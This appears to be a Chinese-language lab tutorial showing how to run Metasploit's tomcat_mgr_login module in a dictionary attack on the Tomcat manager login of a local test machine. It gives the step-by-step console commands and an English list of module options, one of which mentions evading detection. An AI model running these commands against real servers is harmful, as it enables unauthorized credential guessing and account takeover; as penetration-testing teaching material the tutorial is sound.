本文使用 Metasploit module 去执行一个对Tomcat服务器的字典攻击，用来获取管理后台的密码。

实践-准备

如果是第一次使用，可能需要初始化并启动数据库：

msfdb init

msfdb start

实践-操作

1. 启动Metasploit的控制台：

msfconsole

2. 加载模块:tomcat_mgr_login

use auxiliary/scanner/http/tomcat_mgr_login

3. 查看可用参数

show options

4. 设置目标机器IP：

set rhosts 192.168.150.143

5. 通过添加线程数，可以加速任务，这里我们设置为 5：

set threads 5

6. 如果暴力破解速度过快，服务器会应为短时间内接收大量请求而崩溃，这里我们降低速度：

set bruteforce_speed 3

7. 其他配置保持默认，使用默认字典，开始执行：

run

Paste_Image.png
Paste_Image.png

如图，绿色 + 号开头的那个，就是找到的匹配密码

总结

默认情况下，Tomcat使用TCP的8080端口，控制台应用上下文是：
/manager/html，这个应用使用HTTP认证。Metasploit 辅助模块(tomcat_mgr_login)中的一些配置，说明如下：

• BLANK_PASSWORDS: Adds a test with blank password for every user tried
• PASSWORD: It's useful if we want to test a single password with multiple users or to add a specific one not included in the list
• PASS_FILE: The password list we will use for the test
• Proxies: This is the option we need to configure if we need to go through a proxy to reach our target or to avoid detection
• RHOSTS: The host, hosts (separated by spaces), or file with hosts (file:/path/to/file/with/hosts) we want to test.
• RHOSTS: The host, hosts (separated by spaces), or file with hosts (file:/path/to/file/with/hosts) we want to test
• STOP_ON_SUCCESS: Stop trying a host when a valid password is found in it
• TARGERURI: Location of the manager application inside the host
• USERNAME: Define a specific username to test, it can be tested alone or added to the list defined in USER_FILE